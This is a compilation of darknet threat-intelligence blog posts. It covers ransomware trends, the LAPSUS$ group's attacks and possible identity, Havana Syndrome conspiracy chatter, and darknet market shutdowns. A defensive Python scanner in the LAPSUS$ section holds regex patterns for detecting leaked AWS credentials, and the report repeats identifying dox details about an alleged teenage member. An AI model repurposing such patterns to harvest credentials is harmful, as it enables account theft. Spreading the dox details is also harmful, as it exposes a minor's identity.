  • Conti was offline for almost a week due to infrastructure leaks and fractures with their Ukrainian-aligned affiliates. Since March 1st, the group has resumed locking and leaking victims’ networks around the world.
  • Several key Tor services for well-known RaaS gangs, including Pay2Key, Blackbyte, and Cuba, are online and active; however, they have not shared any victims’ data since the invasion on February 24th, 2022.
  • A new RaaS group called Pandora Gang hit multiple victims in a matter of days, including two victims from Japan.
  • STORMOUS ransomware has been heavily targeting Ukraine.
  • STORMOUS most recently attacked 4A Games (Ukraine) and EPIC Games (US).
  • Given the severity of the attacks against Nvidia and SAMSUNG, LAPSUS$ is now being categorized as a RaaS gang, even though they do not have an affiliate program that we are aware of.
  • US, Canada, UK, Czech Republic, and Germany have the highest volume of ransomware victims in the distribution of victims by location published over the last two weeks.
  • Many ransomware victims have direct connections to US and Western critical corporate/government operations and supply chains.

NOTE: The charts below do not take into consideration attacks by Russia against Ukrainian networks in conjunction with HERMETIC WIPER attacks or leaks released by Free Civilian. The totals, as reported by the Ukrainian government, would exceed those counted here for the US.

LAPSUS$ Group: Additional Findings

The cybercriminal group LAPSUS$ has ramped up their activities since the invasion – emboldened by their attacks against Nvidia and SAMSUNG.

They recently solicited experts in various specific industries for their next victim selection, possibly looking for insiders to assist. Telecommunications, software development/gaming, hosting, and call-centers were among the industries requested.

Over the weekend, LAPSUS$ also implied they were responsible for the recent “cybersecurity incident” at Ubisoft.

DarkOwl will continue to monitor RaaS activity and update as new information becomes available.


Darknet Threat Actor Report: LAPSUS$

In order to curate interesting darknet data collection from sources across the deep web, Tor, I2P and other “darknets,” our analysts regularly follow “darknet threat actors” that openly discuss and disseminate stolen critical corporate and personal data.

In December 2021, DarkOwl witnessed increased activity on the darknet regarding the cybercriminal gang known as LAPSUS$. The group appears to have a preference for attacking Portuguese-speaking organizations using data extortion-style campaigns and leverages compromised AWS servers where possible. Thus far, LAPSUS$’s attacks seem to have had little critical impact on the victims’ organizational operations, with seasoned darknet community members stating the group is “amateur.”

DarkOwl believes the cybercriminal group has potential to become a formidable darknet threat actor with the increasing frequency of attacks in recent weeks. The lethality and economic impact of the attacks against their victims have yet to be determined.

Vodafone Telecommunications in Portugal

Since last December, the darknet threat actor group known as LAPSUS$ has been actively targeting Portuguese speaking services across Latin America and Portugal including prominent media and telecommunications companies on both continents.

Most recently, between 7 and 8 February, Vodafone Portugal – a subsidiary of Vodafone Group in the UK – stated in a press release that the company was subject to a “deliberate and malicious cyberattack with the aim of causing damage and disruption.” Open-source reports indicate the attack impacted Vodafone’s 4G/5G voice and SMS service as well as its television services, but no ransom was demanded. While there is limited information about the attack in the press, Vodafone maintains that no subscriber or sensitive customer data was accessed or stolen.

On the LAPSUS$ Telegram channel, the group posted the word “Vodafone” with the eyes emoji, without directly claiming credit for the attack. When someone directly asked if they were responsible for the Vodafone outage affecting millions of mobile phone subscribers, they stated:

“we don’t confirm or deny this yet.”

LAPSUS$’s Flurry of Activity Since December 2021

DarkOwl analysts have closely followed LAPSUS$ across the darknet, deep web, and adjunct communication platforms since the group claimed responsibility for a major cyberattack against the Brazilian Ministry of Health in mid-December. The cyberattack, allegedly “ransomware in nature,” compromised the Ministry of Health’s COVID vaccination records database, deleting the entire database contents, and defaced its website with the following message:

[TRANSLATED]

“The internal data of the systems were copied and deleted. 50 Tb of data is in our hands. Contact us if you want the data back”

The Brazilian government acknowledged their web services were offline and inaccessible to users for a short period of time, without directly admitting it was LAPSUS$ who carried out the attack. The attack was like other ransomware/extortion-based attacks in the reported deletion of data; however, there was never a monetary ransom demand stated, nor evidence of the group possessing the data or sharing compromised records on the darknet – despite cheers from their online supporters to release information on President Bolsonaro’s vaccination status.

The group posted a statement on Telegram indicating that they had gained access to the Ministry of Health’s Amazon Web Services (AWS) and claimed they did not want to post evidence of their access because they still had access to the system despite the Ministry of Health restoring their services.

On Christmas Eve, the LAPSUS$ group attacked the Claro and Embratel telecommunications companies in Brazil and reportedly stole over 10 PB (10,000 TB) of sensitive corporate information and SIM details for Claro customers from mass data storage systems such as AWS, two GitLab instances, SVN, five vCenter instances (MCK, CPQCLOUD, EOS, ODIN), Dell EMC storage, and Telecom/SS7.

The group shared screenshots on the dark web detailing their level of access to the Claro network infrastructure and data. We are still investigating how the group originally gained access to Embratel and Claro’s infrastructure. The group emphasized the extent of their access within the companies, highlighting that they had access to over 1,500 virtual machines in use by Embratel and 23 unique hosts (IP addresses). From the screenshots, DarkOwl confirmed they used the Windows Remote Desktop application, accessed through their web browser, to connect to many of the compromised computers within the Claro network. The screenshots included network management utilities for the network and their SIM network.

They also shared screenshots from a PowerPoint presentation they found on Claro’s network that detailed how law enforcement intercepts phone calls, SMS messages, and Claro customer network activity.

(Note: the images below have been blurred intentionally so as not to reveal PII)

It is unclear from the screenshots shared whether members of the LAPSUS$ group used their local machines or a virtual environment to carry out the attacks. Nevertheless, the desktop visible in the browser screenshot suggests the OS was Windows and the temperature was 4 degrees Celsius at 21:56 on December 25, 2021.

Applying some simple OSINT analysis using historical weather databases, we discovered São Paulo, Brazil did not have matching weather conditions at that date/timestamp, but London, United Kingdom experienced similar weather patterns. This either means that the LAPSUS$ group includes members from around the world or that their computing environments are set to the UK/GMT time zone.

Regardless of their physical location, the LAPSUS$ group has a preference for attacking Portuguese-speaking organizations on both the South American and European continents. Representatives of the group speak English on their Telegram channel.

In early January, the group conducted defacements similar to those against the Ministry of Health in Brazil, this time against Impresa, a major media outlet and parent of SIC and Expresso in Portugal. The group’s access to Expresso’s direct digital resources was extensive. During the attack, LAPSUS$ members sent phishing SMS texts to Expresso’s subscribers, posted tweets from the news outlet’s verified Twitter account, and defaced that Twitter account, pasting to the top of the page the phrase:

“Lapsus$ is officially the new president of Portugal.” (Source)

Information security researchers have noted that the text of the defacement is ‘Brazilian’ Portuguese – rather than Portuguese from the European continent – increasing the likelihood that the threat actors are based out of Brazil. LAPSUS$ claimed in their defacement that they had access to Impresa’s cloud services at AWS.

[TRANSLATED]

The data will be leaked if the necessary amount is not paid. We have access to the ‘cloud’ panels (AWS). Among other types of devices, the contact for the ransom is below.

Note from our analysts: When we think of “exposed credentials” we generally think of e-mail or server authentication data, e.g. username, e-mail address and/or password. The darknet is also a haven for other types of critical corporate credential data, including developer AWS cloud account identifiers such as keys and secrets for S3 buckets and web services.

Image: Example AWS_SECRET credentials shared on the deep web (Source: DarkOwl Vision)
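The AWS key material described above has a recognizable shape, which a defender can use to find it in internal message exports or repositories before it reaches the underground. The scanner below is an added example written for this post, not DarkOwl’s or AWS’s code; the chat export is constructed, and the key values in it are AWS’s own published documentation placeholders, not live credentials.

```python
"""Scan a text export (e.g. a chat or repository dump) for AWS credential material.

Added example for this post; not DarkOwl's or AWS's code.  The SAMPLE_EXPORT
below is constructed, and the key values in it are the placeholder values AWS
uses in its own documentation, not working credentials.
"""
import re
from dataclasses import dataclass

# Long-term access key IDs start with AKIA, temporary (STS) ones with ASIA;
# both are 20 upper-case alphanumeric characters.
ACCESS_KEY_RE = re.compile(r"\b((?:AKIA|ASIA)[A-Z0-9]{16})\b")

# Secret access keys are 40 characters from the base64 alphabet.  Random
# base64 blobs (hashes, tokens) share that shape, so we require a hint such
# as "aws_secret_access_key" or "secret_key" shortly before the value.
SECRET_RE = re.compile(
    r"(?i)(?:aws)?_?secret(?:_access)?_?key\W{0,3}"
    r"([A-Za-z0-9/+]{40})(?![A-Za-z0-9/+])"
)


@dataclass(frozen=True)
class Finding:
    line_no: int
    kind: str     # "access_key_id" or "secret_access_key"
    masked: str   # redacted value that is safe to put in an alert or ticket


def mask(value: str) -> str:
    """Keep the prefix and last four characters for triage; hide the rest."""
    return value[:4] + "*" * (len(value) - 8) + value[-4:]


def scan_text(text: str) -> list[Finding]:
    """Return one Finding per credential-shaped value, with line numbers."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in ACCESS_KEY_RE.finditer(line):
            findings.append(Finding(line_no, "access_key_id", mask(m.group(1))))
        for m in SECRET_RE.finditer(line):
            findings.append(Finding(line_no, "secret_access_key", mask(m.group(1))))
    return findings


# Constructed chat export.  Line 5 is a 40-character hex commit hash: it has
# the right length but no "secret" hint and is not base64-shaped upper-case
# key material, so it must not be reported.
SAMPLE_EXPORT = """\
[09:12] alice: deploy pipeline is failing again, can you check?
[09:14] bob: use my creds for now: AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
[09:14] bob: AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
[09:20] alice: thanks. also the django SECRET_KEY is in settings.py
[09:25] carol: commit sha 3f9a1b2c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a looks fine
"""

if __name__ == "__main__":
    for f in scan_text(SAMPLE_EXPORT):
        print(f"line {f.line_no}: {f.kind} {f.masked}")
```

A hit on an access key ID should be followed by rotating the key in IAM and checking CloudTrail for use of that key ID, whether or not the matching secret was found in the same export.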

Barely a week after the attacks, LAPSUS$ announced on their Telegram channel that their next victim was Localiza Rent a Car SA. The attack appeared to be a DNS spoofing attack on their website, redirecting Localiza website visitors to a porn site instead.

According to open-source reporting, the company reported a “partial interruption,” and there was no evidence that any customer data or sensitive information was stolen. No ransom demand was made either.

Less than two weeks later, LAPSUS$ shared a Twitter post from Portugal-based Francisco Martins speaking of how the Grupo Cofina attack was against the company and not an attack on press freedom and another post referencing a popular Cofina journalist. LAPSUS$ never officially claimed responsibility for attacking the Portuguese media outlet that impacted multiple digital content platforms including: Correio da Manhã (Morning Mail), Sábado (Saturday) magazine, Jornal de Negócios (Business Journal), Diário desportivo Record and CMTV. (Source)

Technical specifics of the attack against Cofina are still murky, with little to no information coming directly from LAPSUS$. Security researchers note similarities in the “no ransom demand” style of ransomware, e.g. file corruption and extortion carried out by LAPSUS$, and the fact the group hit other major Portugal-based media companies merely weeks before.

Portugal’s Judicial Police (PJ) are actively investigating the incident, and it is not proven that LAPSUS$ carried out the attack. The group could be posting to their Telegram to imply a connection without proof and gain criminal credibility.

Image: Twitter Post Circulated on LAPSUS$ Telegram channel the day of Cofina attack. (Source)

[TRANSLATED]

“The Lapsus group just wanted to shut up Tânia Laranjo #Respect”

Additional Historical Evidence Surfaces

Using DarkOwl Vision, DarkOwl detected previous activity from LAPSUS$ on the deep web and darknet, including posts in July 2021 on RaidForums and other darknet forums claiming they had compromised EA’s networks and stolen data for the FIFA soccer games. On those posts, they shared their PGP key, signed the posts “LAPSUS$”, and logged into the forums using the pseudonym 4c3.

Image: (Raid Forums, URL available upon request)

Posts from the group on another darknet forum last summer were shared in English, detailing to EA that they had found a Remote Code Execution (RCE) vulnerability in the “Frostbite engine” and that they had no intention of targeting console users. This is a typical approach to trying to extort a company over a specific vulnerability, i.e. a “malicious bug bounty.”

In August 2021, the LAPSUS$ group ended up leaking the EA/FIFA data they had stolen after their attempt at extorting the company for $28 Million USD had failed to materialize. (Source: Raid Forums)

Users on RaidForums indicated the 4c3 moniker for LAPSUS$ on the forum was also tied to a CryptBB staff member known as Cyberjagu who was also trying to sell the EA source code. 4c3 denied any connection. According to open-source reporting, analysts with Blackberry’s Research and Intelligence Division confirmed Cyberjagu is some sort of “intermediary” for the cybercriminal group behind the EA/FIFA attack.

Drama Between Doxbin & LAPSUS$

In early January, the “dox” of a potential LAPSUS$ member surfaced on the controversial deep web paste site known as “Doxbin” and has received over 7,000 views as of the time of writing. The dox – intentionally not included here – suggested the LAPSUS$ member was actually a 16-year-old teenager residing in Kidlington, UK who regularly used the pseudonym(s) SigmA, wh1te, and Breachbase in the underground. The dox may have been leaked in retaliation after LAPSUS$ shared hacked internal docs from Doxbin on their Telegram channel on the 5th of January.

According to the LAPSUS$ Telegram channel and the LAPSUS$ Twitter account, SigmA (@sigmaphoned/Alexander) might be a “high-ranking” member of the LAPSUS$ group. Since late January, many of the users on Telegram have been trying to reach SigmA, but he is not responding to messages. The January dox suggested he might be in the process of relocating to Spain with his family. (Source: DarkOwl Vision)

Image: Users in LAPSUS$ Telegram Channel inquire about SigmA’s whereabouts

A Preference for Monero Leads to a Telecommunications Phishing Campaign

Last summer, LAPSUS$ also posted a Monero address on a deep web forum, discovered by DarkOwl Vision. The same address was also included in numerous scam/phishing reports from users of the British mobile telecom providers EE and Orange. In July, EE users reported receiving an ominous message from LAPSUS$ demanding EE pay them “4 millions USD” after making normal iTunes purchases. Perplexing to users, the texts arrived from historical “iTunes messaging” phone numbers.

Image: (Source)


Darknet Indicators of Anomalous Health Incidents (AHIs)

The U.S. Department of State and three-letter agencies across the U.S. Intelligence Community – which staff a mixture of darknet intelligence and open-source intelligence (OSINT) researchers across a variety of security sectors – have been increasingly concerned by reports of what the U.S. Government officially identifies as “anomalous health incidents” (AHIs). The news media has generally labeled these incidents “Havana Syndrome,” because the first reports originated from diplomats located at the U.S. embassy in Cuba in 2016; the incidents continue today around the globe.

An interim intelligence report on the subject was recently released by the CIA after President Biden’s call for answers as to the cause of the incidents and Congress passed the HAVANA Act last fall to help compensate victims. The report, briefed by government officials to POLITICO in mid-January, has received criticism for its “preliminary” intelligence assessment, which concluded no U.S. foreign adversary nor specific directed energy weapon is likely behind the nearly 1,000 allegedly directed attacks against government personnel stationed in embassies around the world.

Given the lack of inter-agency coordination on the interim report, it’s unclear whether these findings signal a finale to USG’s overarching investigation. According to open source reporting, there are still several cases the CIA could not explain and CIA Director William Burns issued a statement suggesting the agency will continue to look into the matter.

“We have reason to believe the interim report does not even represent the consensus of the full CIA, instead reflecting the views of a subset of officials most interested in resolution and closure.” - Statement from CIA Director William Burns

Recognizing the uncertainty of the findings and widespread outrage from AHI victims, DarkOwl sought out to gather and assess data across the darknet and deep web to provide supplemental indication of the public sentiment regarding AHIs, as well as additional insights into the potential technological sources that may be targeting diplomats and intelligence officials.

Chatter Spreading Potential Nation-State Sponsored Propaganda

During our research, we discovered indications of deep web users sharing Russia-sponsored anti-US propaganda related to mind-control and directed energy induced schizophrenia. For example, one user shared a link to content of this nature via a WordPress “blog” that directly references and links to an “independent research news website” called “Global Research” (globalresearch.ca). In 2020, the State Department identified the allegedly Canadian news outlet as a Russian controlled propaganda front.

  • According to DNS records, the WordPress blog domain cited (youarenotmybigbrother.blog) on the deep web is hosted on a server located at the IP address: 192.0.78.24/25, located in San Francisco, California.

  • DarkOwl reviewed the “Canadian” Global Research website for mentions of “Havana Syndrome” and surprisingly found no recent mentions of “Havana syndrome” or AHIs or any official neurological research, but instead found multiple re-shares of articles citing a study from the University of Edinburgh directly contradicting the State Department’s 2018 commissioned report from the University of Pennsylvania, peer reviewed and published by the Journal of the American Medical Association (JAMA).

  • The general lack of reporting related to Havana Syndrome on the Global Research website, including disinformation suggesting the incidents are caused directly by the USG or non-foreign directed energy sources, is significant and warrants further analytical review of other known Russian-sponsored propaganda websites.

  • Since the release of the interim CIA report last week, darknet and deep web users are aggressively re-sharing articles and podcasts “debunking” the idea of Havana Syndrome entirely as a mass psychogenic illness resulting from an internal U.S. government propaganda disinformation narrative to demonize Russia and destabilize US-Cuba geopolitical relations.

Some deep web users hypothesize the remote possibility that US adversarial governments – such as Russia and China – use low earth orbit satellites and even cellphone towers to direct nefarious RF signal attacks at targeted individuals.

  • In summer 2021, an anonymous user of the deep web imageboard known as 4chan theorized that AHIs are caused by Russian space assets or US-based cell phone antennas that have potentially been converted into microwave microphones to detect speech and that inadvertently over-amplify the signal, causing brain damage. Other users of the same forum also imply that these attack vectors could be deployed by the US against its own personnel as part of some sort of covert operation.

  • On the subreddit /r/TargetedEnergyWeapons, Reddit users shared video from a 1985 CNN news report of a U.S.-based RF directed energy weapon called the “Brain Bomb,” which the U.S. government reportedly never pursued, in an attempt to discredit the USG.

4chan discussion about “Havana Syndrome” being caused by Russian-space listening devices (original thread removed by website since discovery)

Technical Materials Related to AHIs on the Darknet

Our analysts identified numerous mentions of the US government’s historical activities related to psychotronic and psychological warfare. Several deep web users circulated “blogs” – dating back to 2010 – that include a comprehensive archive of information related to potential neurological and psychological weapons developed by DARPA and the US Military as well as similar tools at the disposal of Russian intelligence arms.

The aforementioned blog highlights reports from the early 2000s that Putin supposedly outlawed the use of weapons of psychotronic influence with the intent to cause harm, despite the fact psychotronic weapons were specifically mentioned in open-source reporting of Russia’s advanced weapons state procurement plans outlined for 2011-2020.

“The development of weaponry based on new physics principles; direct-energy weapons, geophysical weapons, wave-energy weapons, genetic weapons, psychotronic weapons, etc., is part of the state arms procurement program for 2011-2020”

— Russian Defense Minister Anatoly Serdyukov after meeting with Putin in March 2012

DarkOwl analysts also observed numerous darknet and deep web users discussing and resharing a 1976 declassified intelligence report from the Defense Intelligence Agency titled, “Biological Effects of Electromagnetic Radiation (Radiowaves and Microwaves) Eurasian Communist Countries (U).”

Segment from declassified 1976 DIA report shared on the darknet

Another report shared across darknet and deep web users originated from the U.S. Army and dates back to December 13th, 2006. The report was released through an official Freedom of Information Act request by a Mr. Donald Friedman of California, USA.

The document contains an unclassified addendum to another intelligence assessment, which was developed by the National Ground Intelligence Center (NGIC) and likely originated in the late nineties, based on the document number. The US Intelligence Community downgraded the report from SECRET//NOFORN and details the “Bioeffects of Select Nonlethal Weapons”.

Darknet users referencing this report generally used it as supporting evidence that the US military has conducted extensive research on the effects of microwave radiation for battlefield and crowd control use. Like the March 1976 report, the NGIC intelligence reporting regarding the effects of directed pulsed radio-frequency correlates with the symptoms experienced by diplomats and intelligence personnel reporting AHIs.

The report also identifies that the associated technology is readily commercially available, but would need to be customized for intensity variability and targeted use.

US Army response to 2006 FOIA request dated, 13 December 2006.

Segment from the NGIC report detailing the technology’s biological influence on the subject.

The NGIC report further identifies auditory phenomena experienced by subjects, e.g. “clicking, hissing, ticking, and buzzing,” consistent with the 2018 JAMA report consolidating the findings from the University of Pennsylvania clinical study of AHI victims. These symptoms are near identical to symptoms connected with the “Frey Effect,” discussed extensively by chat platform users and Reddit discussion forum participants, as well as in research conducted by the Robert Lansing Institute.

“Ability to hear the “sounds” depends on high frequency hearing and low ambient noise. Pulsed RF/MW in the 2.4-10,000MHz range produces perceived noises that resemble sounds “such as a click, buzz, hiss, knock, or chirp”–just as diplomats report. ”

— Quote Correlating Diplomats’ Symptoms to the Frey Effect (Source: Robert Lansing Institute)

Segment from the NGIC report detailing the technology’s biological influence on the subject.

One darknet Tor service we identified has over 1,400 technical documents detailing numerous radio frequency (RF) and directed energy (DE) based technologies utilized for such subjects as: mind control, remote viewing, psychoacoustic effect, and electronic surveillance.

Much of the content includes academic research and intelligence agency and military documentation as well as biographies of key academic and intelligence researchers in paranormal studies and mind control related topics. The originating domain has not been online since November 2018, but all available content from the domain is archived in the DarkOwl Vision database of historical darknet records.

Source DarkOwl Vision (DocID: 68eafa7fafe9be29be48f419d8c1fb89b4fa5707)

Another user on Tor posted a report as recently as late August 2021 describing a US Navy sound-based non-lethal weapon program. According to the post, this program utilizes a recording of the target’s own voice, captured with a long-range microphone, that the system distorts by applying phase shifting and auditory track overlay and feedback.

The weapon, called the Acoustic Hailing and Disruption (AHAD) system, then transmits the high-intensity auditory signal directly back to the target using a parametric speaker, disorienting them to the point that they are confused and cannot speak.

Darknet post detailing US and Russian non-lethal weapon technologies. (Source: DarkOwl Vision – DocID d75544cb73549b3db675562290debec678700692)

A darknet discussion forum user talks of Active Denial Systems (ADS) to cause a sensation of being on fire for crowd control. (Source: DarkOwl Vision – DocID 1b851c844c50ed2099adce8ba48e4963146dc6b3)

The same darknet service also highlights a similar technology called the 5P-42 Filin that has purportedly been in production since 2019 by the Russian military. This technology allegedly uses a pulsed beam of light to disrupt a target’s vision and cause temporary nausea.

According to additional open-source reporting, the Filin, also known as the “Eagle Owl” in Russian, was originally manufactured for use on large naval warships and frigates by Russian state military contractor, Ruselectronics, and considered a “weapon of mass disorientation.”

A ground-based portable version of the same system is in development (if not already in production) for use by special forces in close-combat anti-terrorism operations.

Brochure detailing technical specifications of the Russian 5P-42 Filin Weapon System. (Source)

AHIs on the darknet and deep web: AHI technologies for sale and hobbyist experimentation

DarkOwl analysts also observed that EMF-based technologies and associated hardware could be purchased from darknet marketplaces and improvised using COTS products to conduct targeted rogue AHIs and human neurological experimentation.

During the course of our investigation, we also uncovered evidence of electromagnetic frequency generators, designed for jamming wideband telecommunications signals such as GSM, LTE, and GPS, for sale on darknet marketplaces for under $500 USD.

With the knowledge provided across other darknet and OSINT sources about ADSs, the device could be easily improvised and repurposed for a malicious objective. DarkOwl detected an advertisement for limited quantities of a military-grade frequency jammer in September 2020 for $1,200 USD.

The documents shared on that darknet domain include specific frequencies and intensities of unique RF and DE waveforms said to cause specific bioeffects, and could easily be replicated by hobbyist electrical engineers with access to darknet and deep web content.

In one circumstance, a San Francisco-based Medium user known as “Jay” has purportedly been “targeted by DEW [directed energy weapons] for the last four years” and has since been researching directed energy extensively to better understand the threat. As of November 2018, he had concluded the frequency of the threat fell within the range of 18 to 50 GHz, based on measurements taken with commercial off-the-shelf (COTS) Narda and TriField electromagnetic frequency (EMF) meters.

Other deep web sites also include posts with detailed step-by-step instructions for how to make “Home Made” Active Denial Systems operating at 2.4GHz from items readily available inside someone’s residence. The author implies the 2.4GHz waveforms can remotely induce headaches, fevers, cataracts, or other chronic-fatigue symptoms in a human target.

“Home Made” Directed Energy Weapon described on the deep web (Source redacted for security purposes)

AHI conspiracy theories on the darknet and deep web

At the conclusion of our analysis, we determined that most of the content related to AHIs from underground darknet and deep web sources is driven by conspiracy theories. For example, in July 2021, one user on a Telegram channel postulated that “Havana syndrome” and “Monkeypox” were a concerted agenda to cover up adverse reactions from the COVID vaccination.

By and large, this type of fear, uncertainty, and doubt is widely circulated and quite popular across the deep web, in particular, “anti-vax” communities and clearly not remotely accurate, given AHIs were recorded well before the COVID-19 pandemic.

Source DarkOwl Vision DocID: 5c860642d80f221e6a86199fb915877285140bea

Long before reports of AHIs surfaced in public news media, the darknet and its associated underground communities housed a considerable population of anti-government advocates with deep-rooted beliefs in a “deep state” – including the notion that western governments sanction and/or actively conduct non-consensual psychological and neurological experiments on their populations.

Believers are equipped to evangelize other forum and chatroom members, armed with reports relating to government projects like MKUltra, NSA’s TEMPEST, and “Silent Talk” and detailed research pertaining to peripheral topics such as synthetic telepathy, active denial systems, and psychotronic influence. Many times, such users are quickly labeled “tin-foil hats” and easily dismissed; however, DarkOwl analysts have witnessed their influence increase since the Guardian published information leaked by Edward Snowden and since reports of AHIs outside of Cuba and China began circulating more widely.

Some darknet discussion forum users assert they have been directly attacked with directed energy in a similar fashion to the AHIs reported by deployed State Department personnel. There is no way to confirm the veracity of such statements.

Darknet users discussing the Havana Syndrome (Source: DarkOwl Vision -DocID: 47c5b3b89f1176fe6f025b3346af860fcb680d49)

Some deep web users have also been circulating blog content from the surface web that supports the idea of a global New World Order with the ability to control mass populations and targeting individuals with AHI for a specific and often nefarious agenda. Users point to the persecutory delusion known as “gang stalking” and associated websites replete with technical and academic content in attempt to legitimize their conspiracy theory and their perception of being targeted directly by the government.

  • According to DNS records, the blog referenced above (gangstalkingmindcontrolcults.com) is hosted on a server at the IP address: 192.124.249.178 and is located in Menifee, California.

Conclusion

During the course of our research, our analysts identified a significant quantity of Havana Syndrome-related information across numerous sources in the underground. Much of this information is directly tied to anti-US propaganda, disinformation campaigns, and baseless conspiracy theories. However, there is also legitimate information on active denial directed energy weaponry circulating in a violence-inciting atmosphere on the deep and dark web, which can easily enable and embolden an ordinary person’s ability to successfully carry out sinister attacks using AHI technology.


Curious about something you’ve read? Interested to learn more? Contact us to learn how darknet data applies to your use case

Disappearance of Darknet Markets Points to Potential Exit Scams or Seizures

After observing unusual darknet marketplace activity over the past few weeks, our analysts performed a retrospective investigation that uncovered a wide-scale shift in the active-marketplace spectrum. This investigation was prompted by the observation that, over the last two weeks, a number of prominent darknet marketplaces suddenly went offline without any indication of their return or any explanation regarding the cause of their disappearance. Upon further analysis, data demonstrated that in late December, URLs for over 30% of the known darknet markets operating on Tor would not load. The volume of downed marketplaces prompted DarkOwl’s team to take a closer look, only to discover an underground community as perplexed as we were.

Was this the result of a coordinated marketplace Exit Scam?

Figure 1: Graph depicting the status of darknet markets over the last 9 weeks

In response to this sudden mass closure of darknet markets, users on the popular discussion forum Dread suggested that it was a concerted “Exit Scam.” So, what is an exit scam?

The darknet is home to many a scammer, and darknet marketplaces have historically been a high-stakes risk for buyers, who will often deposit cryptocurrency on the market “in escrow” to transact through the market with illicit goods’ vendors. Over the years, DarkOwl has witnessed several marketplaces shut down without warning to their buyers or vendors and escape with several million dollars’ worth of their customers’ cryptocurrency in the process. The same can occur with vendors who take their buyers’ funds for a good or service and never deliver. Either scenario is referred to as an “exit scam.”

Very few marketplace administrators publicly “retire” and gracefully shut down their operations like White House Market (WHM) did back in October 2021.

More often, the darknet rumor mill across forums and discussion boards hints at the potential “exit scam” of a market a few weeks prior to its disappearance. For example, when Wall Street Market (WSM) shut down in April 2019, it was believed that WSM admins had exit scammed their buyers and vendors, with one moderator further attempting to extort the market’s users for 0.05 BTC or risk having their known physical addresses of record from transacting on the market leaked. Shortly after, Germany’s criminal police unit, known as the Bundeskriminalamt (BKA), announced they had seized the market and its digital infrastructure and arrested at least three administrators in Germany.

Tracking the online/offline status of darknet markets per week

DarkOwl analysts compiled the following table, which tracks the status of each darknet marketplace in question over the course of the weeks during which the heightened activity occurred.

A market’s status is changed to CLOSED once the market has been OFFLINE for 3 to 4 weeks in a row or the administrator of the market has announced retirement or exit scam on a public discussion forum or Dread subdreadit.

Figure 2: Chart depicting the status of darknet markets over the last 9 weeks

Did persistent DDoS attacks lead to marketplace admin retirements?

Other theories around this shift in the market point to the potential scenario of administrator burnout and subsequent retirement after reportedly repeated DDoS attacks in recent months.

In the middle of December, Torrez Market officially announced its retirement, with the market admin, known as mrBlonde, advising darknet users to “use common sense” and avoid relying on an “established market,” stating that the older a market gets, the more likely it is to collapse.

Shortly before the new year, a DDoS attack appeared to affect a handful of markets, including Cartel Market, which posted that it was experiencing outages; the attack took the market offline without any official word from its administrator. Vendors on the market suggested they lost access to their accounts prior to the DDoS attack.

Around the same time, Cannazon also suffered a DDoS attack and then posted that they were “retiring” and not pulling an exit scam.

“Everyone knew this day would come. No market will be here forever. We are officially retiring.”

— Cannazon Team PGP Message

DDoS attacks prior to a market shutdown have served as a “canary in the coal mine” for a market seizure by an international law enforcement effort. Law enforcement could have easily taken over the Cannazon admins’ accounts and posted the PGP message on Dread. Nevertheless, there are some indications from the darknet community that a war between marketplaces has emerged in recent weeks, with DDoS as the weapon of choice.

At the time of writing, users of World Market stated they were getting 502 errors and the market appeared to be under heavy DDoS attack. Two days ago, the market administrator, Lovelace, posted a message directed at Dark0de claiming the competitor market’s team was using a circuit tool attack (DDoS) against World Market’s main mirror and ASAP Market. The comments included a lengthy post by DeSnake, the administrator of the recently revitalized AlphaBay Market.

Coincidentally, since mid-November the URLs for the market called “Potluck Market” have been redirecting to World Market. Potluck Market supposedly closed back in late 2020 after a scandal ensued when the market staff hired a known pedophile. Potluck staff member Florida, in a lengthy post on Dread shortly before the closure, argued that vetting staff before hiring is just as important to OpSec.

Late last week, Dark0de was also inaccessible, and two weeks ago the market’s admin posted on their Dread subdreadit that they too were under DDoS attack.

DarkFox market was offline for over 5 days for “maintenance” and many Dread users feared it too was exit scamming, but at the time of writing, the market appears back online and stable along with a new mirror equipped with “anti-DDoS filters.”

On a German discussion forum, one user posted that they believe Monopoly Market – offline since the end of 2021 – had also exit scammed.

Users on Dread have been equally concerned, with posts titled “RIP Monopoly” on its subdreadit. The moderator for the subdreadit, ShakyBeats, proposed locking down the board until word from the market administrator was heard. Another user argued that the exit scam theory was weak, considering that a week before it went down the administrator launched an “update” to the market server software that updated critical dates of the vendors’ and buyers’ activities for orders on the market. The user theorized this would have been wasted effort if the administrator had planned to scam a week later.

Notably, after the DDoS attack that impacted Cartel around the end of December, several markets, including ASAP, Yakuza, TOR2Door, Monopoly, Archetype, and TOR Market, all went offline and seemingly headed to a “CLOSED” status. But this week, TOR2Door and TOR Market rallied back online.

Versus Market, a popular market throughout 2020 and offline since early November after enabling DDoS protection, also suddenly reappeared operational without any announcement of its return.

Four other markets, Quest, Hermes, Nemesis, and MGM Grand, also appeared back online after being offline since early November. DarkOwl has no indication these market administrators are working together, but their simultaneous reappearance is suspicious.

–   DarkOwl Vision has tracked Nemesis Market since fall 2021, and its market launch page claims it has been operational since May 2021. The subdreadit for the market, /d/NemesisMarket, has been banned for rules violations, suggesting this market may have been run by scammers.

–   The Hermes subdreadit appeared on Dread a year ago with a post from its market moderator, Stitch3s, claiming 500 users had registered on the market. There has been no new activity since the re-launch.

Final Thoughts

DarkOwl determined during this quick analysis that darknet markets are experiencing instability, with many markets either under heavy DDoS or possibly on the verge of an exit scam. DarkOwl believes Monopoly, Cartel, Yakuza, and Archetype are offline permanently and that Torrez and Cannazon exited due to retirement.

While some suspect that it was a large-scale Exit Scam operation, others have hinted that it could be the by-product of an international law enforcement operation. Interestingly, at the end of last week, seven of the markets that were previously offline and had been assessed as closed permanently reappeared from the ashes, only eliciting further skepticism around the markets and their credibility in general.

It’s unclear whether the DDoS activity against the markets that have recently disappeared is related to law enforcement activity, as the Justice Department has yet to post any seizure banners or make any official announcements. DarkOwl will continue to follow this closely and provide more information as it becomes available.



Tor project announces domain name scheme shift

Last summer, the Tor Project announced that in October it would end support for its legacy v2 domain naming scheme, and began encouraging darknet administrators to migrate their hidden darknet websites – known as onion services – to the more secure v3 address scheme. To non-technical users of the Tor anonymous network this may seem inconsequential and not applicable to them, but Tor’s onion service addressing nomenclature – designated as v2 versus v3 – is the primary mechanism by which services hosted on the network are accessed.

Maintaining persistent access and knowledge of this darknet landscape is critical to provide continuous coverage of data from the dark web.

